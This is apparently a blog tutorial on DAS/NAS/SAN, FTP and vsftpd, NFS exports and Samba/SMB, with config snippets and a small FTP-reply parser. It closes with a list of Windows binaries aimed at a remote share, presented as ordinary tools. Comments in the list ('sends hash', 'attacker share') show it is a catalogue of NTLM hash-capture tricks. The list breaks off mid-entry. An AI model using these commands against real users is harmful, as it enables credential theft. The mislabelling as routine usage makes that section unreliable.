Some Network File Sharing Services
TyeYeah

Storage

There are three storage types:

  1. Direct Attached Storage (DAS)
  2. Network Attached Storage (NAS)
  3. Storage Area Network (SAN)

DAS

Your own desktop computer, with a large-volume disk attached, is a kind of Direct Attached Storage.

NAS

Many routers now let you plug in external USB storage and access it over the LAN; that is a kind of Network Attached Storage.

SAN

A SAN uses a dedicated SAN switch as the gateway to distributed storage devices. This is suitable for large companies.

File Transfer Protocol

FTP is a client/server (C/S) protocol and a dual-channel protocol: port 21 for commands and port 20 for the data connection.


From the server side, FTP has two modes.

  • PORT (active) style
    command: client random port -> server port 21
    data: client random port <- server port 20
    The client port to connect to is negotiated over the command channel (the client announces it with a PORT command).
  • PASV (passive) style
    command: client random port -> server port 21
    data: client random port -> server random port
    The server port to connect to is negotiated over the command channel (the server announces it in its reply to PASV).

The server command port is always 21. The server data port is fixed (normally 20) in PORT style and chosen by the server in PASV style.


Example: in PASV style the server replies 227 Entering Passive Mode (172,16,0,1,224,59); the server data port to connect to is 224*256+59 = 57403.
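As an added example (not code from the original post), the following Python parses a 227 reply into the address and port a client must connect to, and builds the PORT command a client sends in active mode, which is the inverse encoding. The reply strings are constructed samples; the `control_host` parameter is my own addition, modelling a client that ignores the advertised address and reuses the address of the control connection.

```python
import re
from typing import Optional, Tuple

# Added example, not from the original post. Parses the 227 reply of PASV
# mode into (host, port) and builds the PORT command used in active mode.
# The reply strings used in __main__ are constructed samples.

PASV_TUPLE_RE = re.compile(
    r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


def parse_pasv_reply(reply: str, control_host: Optional[str] = None) -> Tuple[str, int]:
    """Return (host, port) from a '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' reply.

    port = p1*256 + p2. When control_host is given it replaces the advertised
    address: a client that reuses the control connection's address cannot be
    redirected to a third host by a bogus 227 reply, and a server behind NAT
    usually advertises a private address that is unreachable anyway.
    """
    if not reply.startswith("227"):
        raise ValueError(f"not a PASV reply: {reply!r}")
    m = PASV_TUPLE_RE.search(reply)
    if m is None:
        raise ValueError(f"malformed PASV reply: {reply!r}")
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError(f"field out of range in PASV reply: {reply!r}")
    host = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]
    if port == 0:
        raise ValueError("PASV reply advertises port 0")
    return (control_host or host, port)


def build_port_command(host: str, port: int) -> str:
    """Encode the client's listening address as a PORT command (inverse of the 227 tuple)."""
    octets = host.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {host!r}")
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return "PORT " + ",".join(octets + [str(port // 256), str(port % 256)])


if __name__ == "__main__":
    print(parse_pasv_reply("227 Entering Passive Mode (172,16,0,1,224,59)"))  # ('172.16.0.1', 57403)
    print(build_port_command("172.16.0.1", 57403))  # PORT 172,16,0,1,224,59
```

Pass the address of the control connection as `control_host` when you want the client to refuse redirection to an address other than the one it dialled.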

Softwares

Server side:

  • Wu-ftpd
  • Proftpd
  • Pureftpd
  • Filezilla Server
  • Serv-U
  • Wing FTP Server
  • IIS
  • Very Secure FTP Daemon (vsftpd, popular)

Client side:

  • ftp
  • lftp
  • lftpget
  • wget
  • curl
  • browser

Very Secure FTP Daemon

vsftpd is a relatively popular FTP server program.
Service unit / init script:

/usr/lib/systemd/system/vsftpd.service
/etc/rc.d/init.d/vsftpd

Start the Service:

$ systemctl start vsftpd

Config file location:

/etc/vsftpd/vsftpd.conf

Configuration items:

# PORT style (Windows clients use this by default)
connect_from_port_20=YES # make the data connection originate from port 20
ftp_data_port=20 # change this to use a port other than 20
# PASV style (Linux clients use this by default)
pasv_min_port=6000 # passive range from 6000
pasv_max_port=6010 # to 6010

use_localtime=YES # NO by default, which means GMT is used
anonymous_enable=YES # NO by default in CentOS 8
no_anon_password=YES # anonymous users need no password
anon_upload_enable=YES # upload privilege
anon_mkdir_write_enable=YES # mkdir privilege

Network File System

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems (Sun) in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.
NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system and fits the client/server (C/S) architecture.
NFS is an open standard defined in a Request for Comments (RFC), allowing anyone to implement the protocol.

Softwares

On CentOS (in yum repo) the NFS Utilities package (nfs-utils) contains the userspace server and client tools necessary to use the kernel’s NFS abilities.

On Ubuntu (in apt repo) we have nfs-kernel-server for server side and nfs-common for client side.

nfs-utils

It is for CentOS.
The package is nfs-utils.
Related packages are rpcbind (required) and tcp_wrappers.
The kernel module needed is nfs.ko.

Port 2049 is used by nfsd; the other ports are assigned by rpcbind (called portmap before CentOS 6).

NFS service process:

  • rpc.nfsd
    • The most important NFS process; manages whether a client can log in
  • rpc.mountd
    • Mounts and unmounts NFS, including permission/privilege management
  • rpc.lockd
    • Non-essential; manages file locks to avoid simultaneous-write errors
  • rpc.statd
    • Non-essential; checks file consistency and repairs broken files

Logs in /var/lib/nfs/, and configurations are /etc/exports and /etc/exports.d/*.exports.

Format of config files:

/dir    host1(opt1,opt2)    host2(opt1,opt2) ...
# share '/dir' with host1, host2 and ...
# 'host' can be IPv4, IPv6 or an FQDN (Fully Qualified Domain Name), like:
172.18.0.0/255.255.0.0
172.18.0.0/16
www.domain.com
*.domain.com
# 'opt' defaults to (ro,sync,root_squash,no_all_squash); the options include:
ro,rw -- read-only and read-write
async -- asynchronous, do not write immediately, higher performance
sync -- synchronous, write immediately after data changes
root_squash -- remote root is mapped to nfsnobody/nobody, UID 65534
no_root_squash -- remote root is mapped to the local root user, with no privilege squashing
all_squash -- all remote users become nfsnobody/nobody
no_all_squash -- retain the UID and GID of the remote user
anonuid and anongid -- map anonymous users to the given UID and GID instead of nfsnobody; can be combined with all_squash

Some NFS related tools:

  1. rpcinfo: show RPC information
    • -p [hostname] show the port list
    • -s [hostname] show registered programs
  2. exportfs: manage NFS exports
    • -v show all local NFS shares
    • -r reread the config files and re-export the directories
    • -a export all local shares, resuming any that were suspended
    • -au unexport all local shares
  3. showmount
    • -e [hostname] print the list of shared directories
  4. autofs: service for automatic mounting
    • package: autofs
    • service: /usr/lib/systemd/system/autofs.service
    • config file: /etc/auto.master
  5. mount.nfs: also used for automatic mounting
    • config file: /etc/fstab

For mounting, there are some parameters:

  • fg: mount in the foreground
  • bg: mount in the background
  • hard: keep retrying the request until the server responds (persistent)
  • soft: give up after a timeout (non-persistent)
  • intr: used with 'hard'; allows the request to be interrupted with ctrl+c
  • rsize/wsize: maximum number of bytes read or written per request, e.g. rsize=32768
  • _netdev: do not mount until the network is up

We can mount manually:

mount -o rw,nosuid,fg,hard,intr x.x.x.x:/testdir /mnt/nfs/

Or automatically:

$ vim /etc/fstab
x.x.x.x:/public /mnt/nfs nfs defaults,_netdev 0 0

Usage example:
Start the service on the server side.

$ mkdir /data/share1
$ mkdir /data/share2
$ touch /data/share1/share1.txt
$ touch /data/share2/share2.txt
$ vim /etc/exports
$ cat /etc/exports
/data/share1/ *
$ vim /etc/exports.d/test.exports
$ cat /etc/exports.d/test.exports
/data/share2 *
$ exportfs -v
$ exportfs -r
exportfs: No options for /data/share1/ *: suggest *(sync) to avoid warning
exportfs: No options for /data/share2 *: suggest *(sync) to avoid warning
$ exportfs -v
/data/share1 <world>(sync,wdelay,hide,no_subtree_check,sec=sys,ro,secure,root_squash,no_all_squash)
/data/share2 <world>(sync,wdelay,hide,no_subtree_check,sec=sys,ro,secure,root_squash,no_all_squash)

List the shared directories and mount the NFS disks on the client side.

$ showmount -e nfs_server_ip
Export list for nfs_server_ip:
/data/share2 *
/data/share1 *
$
$ mkdir /mnt/nfs1
$ mount nfs_server_ip:/data/share1 /mnt/nfs1
$ ls /mnt/nfs1/
share1.txt

Examples for NFS config.

$ vim /etc/exports
/myshare server.example.com
/myshare *.example.com
/myshare server?.example.com
/myshare server[0-20].example.com
/myshare 172.25.11.10
/myshare 172.25.0.0/16
/myshare 2000:472:18:b51:c32:a21
/myshare 2000:472:18:b51::/64
/myshare *.example.com 172.25.0.0/16
/myshare desktop.example.com(ro)
/myshare desktop.example.com(ro) server[0-20].example.com(rw)
/myshare diskless.example.com(rw,no_root_squash)

$ vim /etc/exports.d/test.exports
/data/share2 * 192.168.32.0/24(ro) 192.168.32.7(rw)

nfs-kernel-server and nfs-common

Configurations and usage are the same as nfs-utils, see this link for the details.

Samba

What is Samba? A collection of different applications which, when used together, let a Linux server perform network functions such as file serving, authentication/authorization, name resolution and print services.

Like CIFS, Samba implements the SMB protocol which is what allows Windows clients to transparently access Linux directories, printers and files on a Samba server (just as if they were talking to a Windows server).

Crucially, Samba allows for a Linux server to act as a Domain Controller. By doing so, user credentials on the Windows Domain can be used instead of needing to be recreated and then manually kept in sync on the Linux server.

Server Message Block

The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.

Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server.

Common Internet File System

CIFS stands for "Common Internet File System". It is a dialect of SMB: a particular implementation of the Server Message Block protocol, created by Microsoft.

CIFS and SMB are interchangeable not only in a discussion but also in application – i.e., a client speaking CIFS can talk to a server speaking SMB and vice versa because CIFS is a form of SMB.

While they are the same top level protocol, there are still differences in implementation and performance tuning (hence the different names). Protocol implementations like CIFS vs SMB often handle things like file locking, performance over LAN/WAN, and mass modification of file differently.

But, in this day and age, you should always use the acronym SMB.

Two reasons:

  1. The CIFS implementation of SMB is rarely used these days. Under the covers, most modern storage systems no longer use CIFS, they use SMB v2 or SMB v3. In the Windows world, SMB v2 has been the standard as of Windows Vista (2006) and SMB v3 is part of Windows 8 and Windows Server 2012.

  2. CIFS has a negative connotation amongst pedants. SMB v2 and SMB v3 are massive upgrades over the CIFS dialect, and storage architects who are near and dear to file sharing protocols don’t appreciate the misnomer. It’s kind of like calling an executive assistant a secretary.

Softwares

Packages:

  • samba: Provide SMB service
  • samba-client: Client
  • samba-common: General tools
  • cifs-utils: Client tools
  • samba-winbind: Related to AD

Services:

  • smbd: Provide SMB (CIFS) service, TCP:139,445
  • nmbd: NetBIOS name resolution, UDP:137,138

Configuration file: /etc/samba/smb.conf
Grammar check: testparm [-v] [/etc/samba/smb.conf]
Client softwares: smbclient, mount.cifs

Usage

Server side:

$ systemctl start smb # start smbd
$ systemctl start nmb # start nmbd

Client side:
Universal Naming Convention (UNC) goes like:

\\sambaserver\sharename
# 'sambaserver' can be a domain name or an IP address

Use smbclient to access:

$ smbclient -L instructor.example.com
$ smbclient -L instructor.example.com -U smb_user
# '-U' takes user%password, or set the environment variables USER and PASSWD
$ smbclient //instructor.example.com/shared -U username
>cd directory
>get file1
>put file2

Mount CIFS file system:

mount -o user=username,password=passwd //server/shared /mnt/smb

Automatically mount at boot:

$ cat /etc/fstab
//server/homes /mnt cifs credentials=/etc/smb.txt 0 0
# 'credentials=' (short form 'cred=') points at a file that replaces the username & password options

$ cat /etc/smb.txt
username=wang # or user=wang
password=password # or pass=password
$ chmod 600 /etc/smb.txt # this step is very important: keep the credentials file private

On Windows we have a lot of tools to use:

net.exe use \\host\share
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share #(noisy, pops an error dialog)
certutil.exe \\host\share
cipher.exe \\host\share
ClipUp.exe -l \\host\share
cmdl32.exe \\host\share
cmstp.exe /s \\host\share
colorcpl.exe \\host\share #(noisy, pops an error dialog)
comp.exe /N=0 \\host\share \\host\share
compact.exe \\host\share
control.exe \\host\share
convertvhd.exe -source \\host\share -destination \\host\share
Defrag.exe \\host\share
DeployUtil.exe /install \\host\share
DevToolsLauncher.exe GetFileListing \\host\share #(this one's cool. will return a file listing (json-formatted) from remote SMB share...)
diskperf.exe \\host\share
dispdiag.exe -out \\host\share
doskey.exe /MACROFILE=\\host\share
esentutl.exe /k \\host\share
expand.exe \\host\share
extrac32.exe \\host\share
FileHistory.exe \\host\share #(noisy, pops a gui)
findstr.exe * \\host\share
fontview.exe \\host\share #(noisy, pops an error dialog)
fvenotify.exe \\host\share #(noisy, pops an access denied error)
FXSCOVER.exe \\host\share #(noisy, pops GUI)
hwrcomp.exe -check \\host\share
hwrreg.exe \\host\share
icacls.exe \\host\share
LaunchWinApp.exe \\host\share #(noisy, will pop an explorer window with the contents of your SMB share.)
licensingdiag.exe -cab \\host\share
lodctr.exe \\host\share
lpksetup.exe /p \\host\share /s
makecab.exe \\host\share
MdmDiagnosticsTool.exe -out \\host\share #(sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
mshta.exe \\host\share #(noisy, pops an HTA window)
msiexec.exe /update \\host\share /quiet
msinfo32.exe \\host\share #(noisy, pops a "cannot open" dialog)
mspaint.exe \\host\share #(noisy, invalid path to png error)
mspaint.exe \\host\share\share.png #(will capture hash, and display the remote PNG file to the user)
msra.exe /openfile \\host\share #(noisy, error)
mstsc.exe \\host\share #(noisy, error)
netcfg.exe -l \\host\share -c p -i foo